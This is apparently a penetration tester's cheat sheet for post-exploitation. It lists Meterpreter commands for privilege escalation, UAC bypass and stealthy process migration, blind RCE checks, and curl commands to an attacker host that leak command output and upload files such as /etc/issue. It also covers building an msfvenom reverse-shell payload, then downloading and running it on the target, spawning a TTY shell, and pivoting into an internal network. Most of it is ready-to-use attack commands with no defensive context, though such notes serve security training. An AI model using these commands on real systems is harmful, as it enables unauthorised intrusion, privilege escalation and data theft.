**Search for Meterpreter Payloads**

* Command: `search meterpreter`

**Put Session in Background**

* Command: `background`

**List Current Sessions**

* Command: `sessions -l`

**Resume Session**

* Command: `sessions -i 1`

**Get Info About Machine**

* Command: `sysinfo`

**Network Info**

* Command: `ifconfig`

**Routing Tables**

* Command: `route`

**Get Current User ID**

* Command: `getuid`

**Elevate Privilege**

* Command: `getsystem`
  * If operation fails, try the following:
    1. Background session
    2. Search bypassuac
    3. Use `exploit/windows/local/bypassuac`
    4. Set session
    5. Exploit

**Uploading/Downloading Files**

* Command: `upload <path>` or `download <path>`

**Use Standard OS Shell**

* Command: `shell`

**See All Processes Running**

* Command: `ps`

**See Process Meterpreter is Attached to**

* Command: `getpid`

**Check UAC**

* Command: `run post/windows/gather/win_privs`

**Migrating Process to be Stealthy**

* When migrating process, the new process must have the same level of privilege:
  * Command: `ps -U SYSTEM`
  * This command will search for all other processes with system-level privilege:
    * Command: `migrate <pid>`

### Remote Code Execution (RCE)

#### Blind RCE

* Test bash sleep command to see if page is delayed:
  * Command: `sleep 5`

#### Testing Network Connectivity

* Use Wireshark to pick up ICMP packets:
  * Command: `ping <attacker> -c 5`
  * May need to use URL encoding to keep syntax intact

#### Testing Webshell

**Get Paths to Installed Programs**

* Command: `echo $PATH`

**Look for Specific Tools**

* Command: `which <tool>`

#### Curl

**See if You Can Establish TCP Connection**

* On Attacker:
  * Setup listener with nc: `nc -lvp 53`
* On Target:
  * Establish TCP with curl: `curl http://<attacker_ip>:<attacker_port>`

**Test Commands with Curl**

* Commands (the target's shell expands the backticks before curl runs, so the command output becomes the requested path and shows up on the attacker's listener):

  ```plaintext
  curl http://<attacker_ip>:<attacker_port>/`whoami`
  ```

**Test Commands with Spaces in the Output with Curl**

* Commands:

  ```plaintext
  curl http://<attacker_ip>:<attacker_port>/`id`
  ```

  * Command above will not display properly because there are spaces in the output; encode it to see the full output (`-w0` keeps the base64 on one line):
    * Command:

      ```plaintext
      curl http://<attacker_ip>:<attacker_port>/`id|base64 -w0`
      ```
  * To decode on the attacker:
    * Command:

      ```plaintext
      echo "<base64_string>" | base64 -d
      ```

**Exfiltrating Files from the Target with Curl**

* `-T` sends the file as the body of a PUT request to the listener on the attacker:

  ```plaintext
  curl http://<attacker_ip>:<attacker_port>/file -T /etc/issue
  ```

**Uploading Files**

1. Start simple Python HTTP server:

* Command:

  ```plaintext
  python -m SimpleHTTPServer 9090    // Python 2
  python3 -m http.server 9090        // Python 3
  ```
* All files in directory you start Python server in will be available via server

2. Generate payload & store it in server directory:

* Command:

  ```plaintext
  msfvenom -p linux/x64/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<port_on_listener> -f elf -o reverse53
  ```

3. Get payload on victim machine:

* Command:

  ```plaintext
  curl http://<attacker_server>:<server_port>/reverse53 -o /tmp/r
  chmod +x /tmp/r
  ```

4. Verify the transfer by pushing the file back to a listener on the attacker and comparing sizes or `md5sum` output:

* Command:

  ```plaintext
  curl http://<attacker_ip>:<listener_port>/ -T /tmp/r
  ```

5. Running payload (start the listener first):

* Command:

  ```plaintext
  nc -lvp <port_on_listener>    // on the attacker
  /tmp/r                        // on the target
  ```

6. Spawning a Better Shell:

* Command:

  ```plaintext
  bash -i
  ```
* Spawns bash environment
* There are many shells you can easily spawn, look them up under “spawning tty shell”:
  * Command:

    ```plaintext
    python -c 'import pty; pty.spawn("/bin/bash")'
    ```

#### Pivoting with Meterpreter

* Command:

  ```plaintext
  background                        // put the current session in the background
  run autoroute -s 172.16.50.0/24   // route traffic for the internal network through that session
  ```

